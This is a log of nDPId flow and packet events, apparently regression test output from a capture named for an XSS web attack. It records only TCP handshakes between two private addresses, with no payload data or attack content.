+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N6NAAD4Gji2sEAABwKgKMtIMAFCkuE+MAAAAAKACchAe+gAAAgQFtAQCCAoBOXgvAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0gwQkJx6pLhPjaAScSAlRgAAAgQFtAQCCAoD40mlATl4LwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1499347115409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347115409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N6RAAD4GjjSsEAABwKgKMtIMAFCkuE+NEJCce4AQAOXETQAAAQEICgE5eC8D40ml"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347116705,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347116705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FEVAAD4GsYusEAABwKgKMtIaAFCixG02AAAAAKACchAB8gAAAgQFtAQCCAoBOXlzAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0hqTGb4kosRtN6AScSBixgAAAgQFtAQCCAoD40rpATl5cwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1499347116706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347116706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FEZAAD4GsZKsEAABwKgKMtIaAFCixG03kxm+JYAQAOUBzgAAAQEICgE5eXMD40rp"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347119336,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AVBAAD4GxICsEAABwKgKMtI0AFAiVX1VAAAAAKACchBvlgAAAgQFtAQCCAoBOXwFAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0jRzeBsiIlV9VqAScSCQfAAAAgQFtAQCCAoD4017ATl8BQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AVFAAD4GxIesEAABwKgKMtI0AFAiVX1Wc3gbI4AQAOUvhAAAAQEICgE5fAUD4017"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347120603,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347120603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA815JAAD4G7j2sEAABwKgKMtJCAFDFAarTAAAAAKACchCeIQAAAgQFtAQCCAoBOX1BAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0kIa0KsLxQGq1KAScSCGiQAAAgQFtAQCCAoD4064ATl9QQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA015NAAD4G7kSsEAABwKgKMtJCAFDFAarUGtCrDIAQAOUlkQAAAQEICgE5fUED4064"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347123174,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347123174,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j6NAAD4GNi2sEAABwKgKMtJcAFBy9vBnAAAAAKACchCn+wAAAgQFtAQCCAoBOX\/EAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0lx1HkCocvbwaKAScSCd9QAAAgQFtAQCCAoD41E7ATl\/xAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1499347123175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347123175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j6RAAD4GNjSsEAABwKgKMtJcAFBy9vBodR5AqYAQAOU8\/QAAAQEICgE5f8QD41E7"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347124454,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347124454,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NtZAAD4GjvqsEAABwKgKMtJqAFC8CbfSAAAAAKACchCWLwAAAgQFtAQCCAoBOYEEAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0moH9pX9vAm306AScSCivAAAAgQFtAQCCAoD41J7ATmBBAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1499347124455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347124455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NtdAAD4GjwGsEAABwKgKMtJqAFC8CbfTB\/aV\/oAQAOVBxAAAAQEICgE5gQQD41J7"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347125743,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347125743,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IcxAAD4GpASsEAABwKgKMtJ4AFAiLqOKAAAAAKACchBDAwAAAgQFtAQCCAoBOYJGAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0niyGNhRIi6ji6AScSBh1wAAAgQFtAQCCAoD41O9ATmCRgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ic1AAD4GpAusEAABwKgKMtJ4AFAiLqOLshjYUoAQAOUA3gAAAQEICgE5gkcD41O9"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347128311,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347128311,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83+lAAD4G5easEAABwKgKMtKSAFBV0VshAAAAAKACchBVLQAAAgQFtAQCCAoBOYTIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0pKrZqcYVdFbIqAScSCpagAAAgQFtAQCCAoD41Y\/ATmEyAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1499347128312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347128312,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03+pAAD4G5e2sEAABwKgKMtKSAFBV0Vsiq2anGYAQAOVIcQAAAQEICgE5hMkD41Y\/"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347129584,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129584,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rtVAAD4GFvusEAABwKgKMtKgAFDfKCjSAAAAAKACchD81wAAAgQFtAQCCAoBOYYHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0qA\/BA1B3ygo06AScSBWEQAAAgQFtAQCCAoD41d9ATmGBwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1499347129585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347129585,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rtZAAD4GFwKsEAABwKgKMtKgAFDfKCjTPwQNQoAQAOX1GAAAAQEICgE5hgcD41d9"} 